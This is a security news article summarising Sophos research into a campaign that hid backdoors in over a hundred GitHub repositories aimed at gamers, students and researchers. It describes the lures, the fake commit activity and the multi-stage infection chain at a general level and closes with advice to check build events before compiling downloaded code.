A sophisticated campaign is targeting hackers, gamers, and researchers with backdoored source code distributed through GitHub repositories, granting attackers remote access to infected devices.
The operation was uncovered by Sophos researchers investigating “Sakura RAT,” a remote access trojan reportedly available on GitHub. Their analysis revealed that the Sakura RAT code was largely non-functional, but the Visual Studio project contained a malicious PreBuildEvent designed to download and install malware when users attempted to compile the code.
Further investigation linked the publisher “ischhfd83” to a network of 141 GitHub repositories, with 133 found to contain hidden backdoors, indicating a coordinated effort to distribute malware. The methods used to embed backdoors vary, including Python scripts with obfuscated payloads, malicious screensaver (.scr) files utilizing Unicode tricks, JavaScript files containing encoded payloads, and malicious Visual Studio PreBuild events.
Some repositories were abandoned in late 2023, but many remain active with automated commits designed to create a false sense of legitimacy and activity. These automated workflows result in unusually high commit counts; one project created in March 2025 had nearly 60,000 commits, with the average across all repositories standing at 4,446 at the time of Sophos’ initial data collection.
Each repository consistently featured three contributors, and different publisher accounts were employed, with no single account managing more than nine repositories. Traffic to these malicious repositories is driven by promotion on YouTube, Discord, and cybercrime forums. The media attention surrounding Sakura RAT is believed to have drawn unsuspecting users to search for it on GitHub.
When a victim downloads these files, simply running or building the code triggers a multi-stage infection process. This process involves the execution of VBS scripts, followed by PowerShell downloading an encoded payload from hardcoded URLs, leading to the fetching of a 7zip archive from GitHub and the execution of an Electron app named ‘SearchFilter.exe’.
The Electron app contains a bundled archive with heavily obfuscated ‘main.js’ and related files, including code for system profiling, command execution, disabling Windows Defender, and retrieving additional payloads. The secondary payloads downloaded by the backdoor include well-known information stealers and remote access trojans such as Lumma Stealer, AsyncRAT, and Remcos, all equipped with extensive data theft capabilities.
The trojanized repositories target a broad range of users, including gamers, students, and cybersecurity researchers, using lures such as game cheats, mod tools, and fake exploits. Given the ease with which anyone can upload source code to GitHub, users are strongly advised to carefully examine source code and verify any pre- and post-build events within projects before compiling software downloaded from open-source repositories.
